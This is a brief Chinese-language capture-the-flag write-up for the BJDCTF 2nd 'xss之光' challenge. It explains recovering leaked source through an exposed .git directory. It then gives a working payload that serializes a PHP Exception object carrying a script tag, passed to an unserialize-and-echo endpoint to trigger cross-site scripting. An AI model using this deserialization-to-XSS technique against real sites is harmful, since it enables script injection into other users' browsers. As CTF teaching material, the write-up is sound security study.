[BJDCTF 2nd]xss之光
存在.git
源码泄露,GitHack得到源码
<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);
两行代码,根据题目名推测需要弹一个XSS弹窗,题目的代码没有类给我们构造反序列化条件,于是就需要利用php
的原生类来进行操作
参考:php可利用的原生类
题目php
版本是5.6.40
,于是利用Exception
类来进行弹窗
$b = new Exception("<script>window.location.href='https://www.baidu.com'</script>");
echo urlencode(serialize($b));
抓包返回头中就有flag
若没有本文 Issue,您可以使用 Comment 模版新建。
GitHub Issues